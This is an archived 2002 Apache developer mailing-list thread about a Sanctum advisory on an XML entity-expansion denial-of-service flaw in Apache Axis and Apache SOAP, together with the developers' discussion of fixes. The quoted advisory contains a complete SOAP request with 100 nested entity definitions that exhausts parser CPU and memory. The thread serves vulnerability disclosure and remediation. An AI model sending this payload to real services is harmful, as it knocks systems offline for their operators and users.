I notice that the Axis solution is brute force: refuse to process any request with a DTD. Since Apache SOAP reads the envelope into a string before parsing it to a DOM, a similarly brute-force approach would be to refuse to process any envelope containing <!DOCTYPE. (If this were intended to a valid part of parameter data, the < would be <.)
Scott Nichol ----- Original Message ----- From: "Sanjiva Weerawarana" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> Sent: Tuesday, November 26, 2002 4:46 PM Subject: Re: Fw: Security Alert - Apache/Axis > Note that this vulnarability exists in Apache SOAP because we use > the DOM parser and there's no way to shut turn off entity expansion > AFAIK. The only solution would be to do some Xerces specific thing > and lose the JAXP capability .. which would suck. > > Sanjiva. > > ----- Original Message ----- > From: "Dirk-Willem van Gulik" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> > Cc: <[EMAIL PROTECTED]> > Sent: Tuesday, November 26, 2002 4:27 PM > Subject: Re: Fw: Security Alert - Apache/Axis > > > > > > Tom/Dims, > > > > Could you folks verify this and report back to [EMAIL PROTECTED] that > > each of those are 100% taken care of ? > > > > Then security@ can report back to the various constituencies, work with > > CERT if that is needed, etc. If you have any thoughds/statement which need > > to be added - make sure you add that. > > > > Dw > > > > On Tue, 26 Nov 2002, Davanum Srinivas wrote: > > > > > I think tom fixed it > (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2) > > > > > > Thanks, > > > dims > > > > > > --- Ted Leung <[EMAIL PROTECTED]> wrote: > > > > This security alert came through today. > > > > > > > > Ted > > > > ----- Original Message ----- > > > > From: "Ian Holsman" <[EMAIL PROTECTED]> > > > > To: <[EMAIL PROTECTED]> > > > > Cc: "Ory Segal" <[EMAIL PROTECTED]> > > > > Sent: Tuesday, November 26, 2002 8:02 AM > > > > Subject: Security Alert - Apache/Axis > > > > > > > > > > > > > Dear [EMAIL PROTECTED], > > > > > > > > > > During a recent security audit at one of our customers, Sanctum > found a > > > > > security vulnerability in your product Apache/Axis. > > > > > The details of this vulnerability are described in the attached text > file. > > > > > > > > > > We intend to issue a public advisory on BugTraq, SecuriTeam and > other site > > > > > forums about this vulnerability the last week of November. Please > note, > > > > the > > > > > advisory will not contain specifics that might enable someone to > exploit > > > > the > > > > > vulnerability. > > > > > > > > > > We would appreciate it if you could issue a patch in that timeline > (i.e. > > > > > around November 25th), so it can be linked to our advisory. > > > > > > > > > > Please feel free to contact me for more information/help. > > > > > > > > > > Thanks, > > > > > -Amit > > > > > > > > > > <<XML_DTD_Axis.txt>> > > > > > > > > > > > > > > > > > > > > > > > ---------------------------------------------------------------------- ---- > -- > > > > ---- > > > > > > > > > > > > > > --------------------------------------------------------------------- > > > > > To unsubscribe, e-mail: [EMAIL PROTECTED] > > > > > For additional commands, e-mail: [EMAIL PROTECTED] > > > > > > /////////////////////////////////////////////////////////////////////// > > > > ========================>> Security Advisory > <<======================== > > > > > /////////////////////////////////////////////////////////////////////// > > > > > > > > > > > > => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/ > > > > > > > > => Release date: 14/Nov/2002 > > > > > > > > => Vendor: Apache Group > > > > > > > > The following product was found to be vulnerable: > > > > > > > > - Apache Axis SOAP server (checked with Xerces-J and Tomcat) > > > > > > > > The versions affected are the latest ones (as of October 2002). > > > > > > > > => Severity: High > > > > > > > > => CVE candidate: Not assigned yet. > > > > > > > > => Summary: Using the DTD part of the XML document, it is possible to > cause the > > > > XML parser to consume 100% CPU and/or a lot of memory, therefore > resulting in > > > > a denial of service condition. > > > > > > > > => Description: The DTD part of the XML document enables the document > to define > > > > named entities (other than the predefined <, >, etc.). The > entities can be > > > > defined using other entities (recursion is prohibited in XML 1.0). > > > > Entities are expanded when they are referenced, inside the XML > document. > > > > The attack is comprised of defining and referencing an entity which is > defined > > > > using two instances of another entity, which is (in turn) defined as > two instances > > > > of yet another entity, and so on. This definition process can be > repeated as long > > > > as "necessary" - we found that nesting level of 100 is usually > sufficient. > > > > The 100th entity should be defined simply as a string. This has the > effect of having > > > > the first entity contain, in theory, 2^99 (two to the power of ninety > nine) > > > > concatenated values of the 100th entity. > > > > Here's an example (the DTD is to be placed after the XML declaration, > and before the > > > > root element of the XML document): > > > > > > > > <!DOCTYPE root [ > > > > <!ENTITY x100 "foobar"> > > > > <!ENTITY x99 "&x100;&x100;"> > > > > <!ENTITY x98 "&x99;&x99;"> > > > > <!ENTITY x97 "&x98;&x98;"> > > > > ... > > > > <!ENTITY x3 "&x4;&x4;"> > > > > <!ENTITY x2 "&x3;&x3;"> > > > > <!ENTITY x1 "&x2;&x2;"> > > > > ]> > > > > > > > > Referring to the first entity inside a document that would otherwise > be accepted by > > > > the application (using the syntax &x1;), results in a DoS condition, > due to the > > > > excessive CPU load and/or memory load required by the XML parser to > expand this entity. > > > > > > > > => Solution: Not available yet. > > > > > > > > => Workaround: Not available yet. > > > > > > > > => Example: > > > > > > > > Ory Segal from Sanctum devised a SOAP request that manages to mount > this attack requiring > > > > only a path to an existing web service to be known to the attacker. > > > > > > > > The request is: > > > > > > > > POST path_to_web_service HTTP/1.0 > > > > Host: ... > > > > Content-Type: text/xml > > > > SOAPAction: "" > > > > Content-Length: 3224 > > > > > > > > <?xml version="1.0" ?> > > > > <!DOCTYPE foobar [ > > > > <!ENTITY x0 "hello"> > > > > <!ENTITY x1 "&x0;&x0;"> > > > > <!ENTITY x2 "&x1;&x1;"> > > > > <!ENTITY x3 "&x2;&x2;"> > > > > <!ENTITY x4 "&x3;&x3;"> > > > > <!ENTITY x5 "&x4;&x4;"> > > > > <!ENTITY x6 "&x5;&x5;"> > > > > <!ENTITY x7 "&x6;&x6;"> > > > > <!ENTITY x8 "&x7;&x7;"> > > > > <!ENTITY x9 "&x8;&x8;"> > > > > <!ENTITY x10 "&x9;&x9;"> > > > > <!ENTITY x11 "&x10;&x10;"> > > > > <!ENTITY x12 "&x11;&x11;"> > > > > <!ENTITY x13 "&x12;&x12;"> > > > > <!ENTITY x14 "&x13;&x13;"> > > > > <!ENTITY x15 "&x14;&x14;"> > > > > <!ENTITY x16 "&x15;&x15;"> > > > > <!ENTITY x17 "&x16;&x16;"> > > > > <!ENTITY x18 "&x17;&x17;"> > > > > <!ENTITY x19 "&x18;&x18;"> > > > > <!ENTITY x20 "&x19;&x19;"> > > > > <!ENTITY x21 "&x20;&x20;"> > > > > <!ENTITY x22 "&x21;&x21;"> > > > > <!ENTITY x23 "&x22;&x22;"> > > > > <!ENTITY x24 "&x23;&x23;"> > > > > <!ENTITY x25 "&x24;&x24;"> > > > > <!ENTITY x26 "&x25;&x25;"> > > > > <!ENTITY x27 "&x26;&x26;"> > > > > <!ENTITY x28 "&x27;&x27;"> > > > > <!ENTITY x29 "&x28;&x28;"> > > > > <!ENTITY x30 "&x29;&x29;"> > > > > <!ENTITY x31 "&x30;&x30;"> > > > > <!ENTITY x32 "&x31;&x31;"> > > > > <!ENTITY x33 "&x32;&x32;"> > > > > <!ENTITY x34 "&x33;&x33;"> > > > > <!ENTITY x35 "&x34;&x34;"> > > > > <!ENTITY x36 "&x35;&x35;"> > > > > <!ENTITY x37 "&x36;&x36;"> > > > > <!ENTITY x38 "&x37;&x37;"> > > > > <!ENTITY x39 "&x38;&x38;"> > > > > <!ENTITY x40 "&x39;&x39;"> > > > > <!ENTITY x41 "&x40;&x40;"> > > > > <!ENTITY x42 "&x41;&x41;"> > > > > <!ENTITY x43 "&x42;&x42;"> > > > > <!ENTITY x44 "&x43;&x43;"> > > > > <!ENTITY x45 "&x44;&x44;"> > > > > <!ENTITY x46 "&x45;&x45;"> > > > > <!ENTITY x47 "&x46;&x46;"> > > > > <!ENTITY x48 "&x47;&x47;"> > > > > <!ENTITY x49 "&x48;&x48;"> > > > > <!ENTITY x50 "&x49;&x49;"> > > > > <!ENTITY x51 "&x50;&x50;"> > > > > <!ENTITY x52 "&x51;&x51;"> > > > > <!ENTITY x53 "&x52;&x52;"> > > > > <!ENTITY x54 "&x53;&x53;"> > > > > <!ENTITY x55 "&x54;&x54;"> > > > > <!ENTITY x56 "&x55;&x55;"> > > > > <!ENTITY x57 "&x56;&x56;"> > > > > <!ENTITY x58 "&x57;&x57;"> > > > > <!ENTITY x59 "&x58;&x58;"> > > > > <!ENTITY x60 "&x59;&x59;"> > > > > <!ENTITY x61 "&x60;&x60;"> > > > > <!ENTITY x62 "&x61;&x61;"> > > > > <!ENTITY x63 "&x62;&x62;"> > > > > <!ENTITY x64 "&x63;&x63;"> > > > > <!ENTITY x65 "&x64;&x64;"> > > > > <!ENTITY x66 "&x65;&x65;"> > > > > <!ENTITY x67 "&x66;&x66;"> > > > > <!ENTITY x68 "&x67;&x67;"> > > > > <!ENTITY x69 "&x68;&x68;"> > > > > <!ENTITY x70 "&x69;&x69;"> > > > > <!ENTITY x71 "&x70;&x70;"> > > > > <!ENTITY x72 "&x71;&x71;"> > > > > <!ENTITY x73 "&x72;&x72;"> > > > > <!ENTITY x74 "&x73;&x73;"> > > > > <!ENTITY x75 "&x74;&x74;"> > > > > <!ENTITY x76 "&x75;&x75;"> > > > > <!ENTITY x77 "&x76;&x76;"> > > > > <!ENTITY x78 "&x77;&x77;"> > > > > <!ENTITY x79 "&x78;&x78;"> > > > > <!ENTITY x80 "&x79;&x79;"> > > > > <!ENTITY x81 "&x80;&x80;"> > > > > <!ENTITY x82 "&x81;&x81;"> > > > > <!ENTITY x83 "&x82;&x82;"> > > > > <!ENTITY x84 "&x83;&x83;"> > > > > <!ENTITY x85 "&x84;&x84;"> > > > > <!ENTITY x86 "&x85;&x85;"> > > > > <!ENTITY x87 "&x86;&x86;"> > > > > <!ENTITY x88 "&x87;&x87;"> > > > > <!ENTITY x89 "&x88;&x88;"> > > > > <!ENTITY x90 "&x89;&x89;"> > > > > <!ENTITY x91 "&x90;&x90;"> > > > > <!ENTITY x92 "&x91;&x91;"> > > > > <!ENTITY x93 "&x92;&x92;"> > > > > <!ENTITY x94 "&x93;&x93;"> > > > > <!ENTITY x95 "&x94;&x94;"> > > > > <!ENTITY x96 "&x95;&x95;"> > > > > <!ENTITY x97 "&x96;&x96;"> > > > > <!ENTITY x98 "&x97;&x97;"> > > > > <!ENTITY x99 "&x98;&x98;"> > > > > <!ENTITY x100 "&x99;&x99;"> > > > > ]> > > > > <SOAP-ENV:Envelope > xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"; > > > > xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"; > > > > xmlns:xsd="http://www.w3.org/1999/XMLSchema";> > > > > <SOAP-ENV:Body> > > > > <ns1:aaa xmlns:ns1="urn:aaa" > SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/";> > > > > <foobar xsi:type="xsd:string">&x100;</foobar> > > > > </ns1:aaa> > > > > </SOAP-ENV:Body> > > > > </SOAP-ENV:Envelope> > > > > > > > > > > > > > > > > > ===== > > > Davanum Srinivas - http://xml.apache.org/~dims/ > > > > > > __________________________________________________ > > > Do you Yahoo!? > > > Yahoo! Mail Plus - Powerful. Affordable. Sign up now. > > > http://mailplus.yahoo.com > > > > > > --------------------------------------------------------------------- > > > To unsubscribe, e-mail: [EMAIL PROTECTED] > > > For additional commands, e-mail: [EMAIL PROTECTED] > > > > > > > >
